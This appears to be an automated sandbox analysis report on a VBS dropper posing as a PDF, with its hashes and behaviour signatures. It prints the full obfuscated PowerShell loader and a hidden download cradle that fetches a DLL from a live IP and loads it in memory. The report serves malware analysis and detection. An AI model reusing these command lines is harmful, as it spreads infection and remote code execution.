Analysis
max time kernel: 94s
max time network: 137s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 30-12-2024 03:13
Static task: static1
Behavioral task: behavioral1
  Sample: RFAU02GSHKOPSFDQW_002_PDF.vbs
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: RFAU02GSHKOPSFDQW_002_PDF.vbs
  Resource: win10v2004-20241007-en
Behavioral task: behavioral3
  Sample: RV07QAROPHDFSRE_001_PDF_clean.exe
  Resource: win7-20241010-en
Behavioral task: behavioral4
  Sample: RV07QAROPHDFSRE_001_PDF_clean.exe
  Resource: win10v2004-20241007-en
General
Target: RFAU02GSHKOPSFDQW_002_PDF.vbs
Size: 222KB
MD5: f212536d8cdf98f7284837ee48886346
SHA1: 7fe473d02fe0dc783b6021c792abca338dc4e11f
SHA256: 91f8e59475196b2ab33f9e5e22beb04d3ee039985abe1572a4a6e7b3f6f8b74d
SHA512: 08524a86d5b9f53953e9587286e7210c48ee403e99c67f13dbdd5081a7d558c58541c4e95b6ca640a98a5e5d8a634127801767655b168fa8889357d3319880c6
SSDEEP: 192:Oply3gSajcsbpS1zQ1QXDebjDqNBft1hx8+W6h8VDvwAv1CjIc:ODokghw1HqR98dfH1Cjj
Malware Config
Extracted URL: http://20.106.255.48/dll/TESTING.txt
Signatures
-
Blocklisted process makes network request (1 IoC)
  flow: 3 | pid: 4252 | Process: powershell.exe
-
Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
Run PowerShell and hide display window.
  pid: 3120 | Process: powershell.exe
  pid: 4252 | Process: powershell.exe
-
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
  description: Key value queried | ioc: \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | Process: WScript.exe
-
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid: 3120 | Process: powershell.exe
  pid: 3120 | Process: powershell.exe
  pid: 4252 | Process: powershell.exe
  pid: 4252 | Process: powershell.exe
-
Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description: Token: SeDebugPrivilege | pid: 3120 | Process: powershell.exe
  description: Token: SeDebugPrivilege | pid: 4252 | Process: powershell.exe
-
Suspicious use of WriteProcessMemory (4 IoCs)
  description: PID 3148 wrote to memory of 3120 | pid: 3148 | Process: WScript.exe | procid_target: 83
  description: PID 3148 wrote to memory of 3120 | pid: 3148 | Process: WScript.exe | procid_target: 83
  description: PID 3120 wrote to memory of 4252 | pid: 3120 | Process: powershell.exe | procid_target: 85
  description: PID 3120 wrote to memory of 4252 | pid: 3120 | Process: powershell.exe | procid_target: 85
Processes
-
Depth 1: C:\Windows\System32\WScript.exe
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFAU02GSHKOPSFDQW_002_PDF.vbs"
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID: 3148
-
Depth 2 (child of PID 3148): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC❤Hk❤d❤Bl❤Fs❤XQBd❤C❤❤J❤BE❤Ew❤T❤❤g❤D0❤I❤Bb❤FM❤eQBz❤HQ❤ZQBt❤C4❤QwBv❤G4❤dgBl❤HI❤d❤Bd❤Do❤OgBG❤HI❤bwBt❤EI❤YQBz❤GU❤Ng❤0❤FM❤d❤By❤Gk❤bgBn❤Cg❤K❤BO❤GU❤dw❤t❤E8❤YgBq❤GU❤YwB0❤C❤❤TgBl❤HQ❤LgBX❤GU❤YgBD❤Gw❤aQBl❤G4❤d❤❤p❤C4❤R❤Bv❤Hc❤bgBs❤G8❤YQBk❤FM❤d❤By❤Gk❤bgBn❤Cg❤JwBo❤HQ❤d❤Bw❤Do❤Lw❤v❤DI❤M❤❤u❤DE❤M❤❤2❤C4❤Mg❤1❤DU❤Lg❤0❤Dg❤LwBk❤Gw❤b❤❤v❤FQ❤RQBT❤FQ❤SQBO❤Ec❤LgB0❤Hg❤d❤❤n❤Ck❤KQ❤7❤Fs❤UwB5❤HM❤d❤Bl❤G0❤LgBB❤H❤❤c❤BE❤G8❤bQBh❤Gk❤bgBd❤Do❤OgBD❤HU❤cgBy❤GU❤bgB0❤EQ❤bwBt❤GE❤aQBu❤C4❤T❤Bv❤GE❤Z❤❤o❤CQ❤R❤BM❤Ew❤KQ❤u❤Ec❤ZQB0❤FQ❤eQBw❤GU❤K❤❤n❤EY❤aQBi❤GU❤cg❤u❤Eg❤bwBt❤GU❤Jw❤p❤C4❤RwBl❤HQ❤TQBl❤HQ❤a❤Bv❤GQ❤K❤❤n❤FY❤QQBJ❤Cc❤KQ❤u❤Ek❤bgB2❤G8❤awBl❤Cg❤J❤Bu❤HU❤b❤Bs❤Cw❤I❤Bb❤G8❤YgBq❤GU❤YwB0❤Fs❤XQBd❤C❤❤K❤❤n❤DU❤Mg❤1❤Dk❤M❤Bl❤GI❤Yg❤w❤DI❤NQ❤0❤C0❤O❤❤z❤Dc❤OQ❤t❤DQ❤Yg❤1❤DQ❤LQBi❤Dc❤ZgBl❤C0❤Mw❤x❤GI❤YwBh❤GY❤N❤❤2❤D0❤bgBl❤Gs❤bwB0❤CY❤YQBp❤GQ❤ZQBt❤D0❤d❤Bs❤GE❤PwB0❤Hg❤d❤❤u❤D❤❤MgBB❤FI❤RQ❤v❤G8❤LwBt❤G8❤Yw❤u❤HQ❤bwBw❤HM❤c❤Bw❤GE❤Lg❤w❤Dc❤N❤Bm❤GY❤LQBz❤HI❤LwBi❤C8❤M❤B2❤C8❤bQBv❤GM❤LgBz❤Gk❤c❤Bh❤GU❤b❤Bn❤G8❤bwBn❤C4❤ZQBn❤GE❤cgBv❤HQ❤cwBl❤HM❤YQBi❤GU❤cgBp❤GY❤Lw❤v❤Do❤cwBw❤HQ❤d❤Bo❤Cc❤KQ❤p❤❤==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('❤','A') ) ).replace('%testinmg%','');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 3120
-
Depth 3 (child of PID 3120): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.255.48/dll/TESTING.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('52590ebb0254-8379-4b54-b7fe-31bcaf46=nekot&aidem=tla?txt.02ARE/o/moc.topsppa.074ff-sr/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))"
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 4252
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize: 2KB
MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize: 64B
MD5: d8b9a260789a22d72263ef3bb119108c
SHA1: 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256: d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512: 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82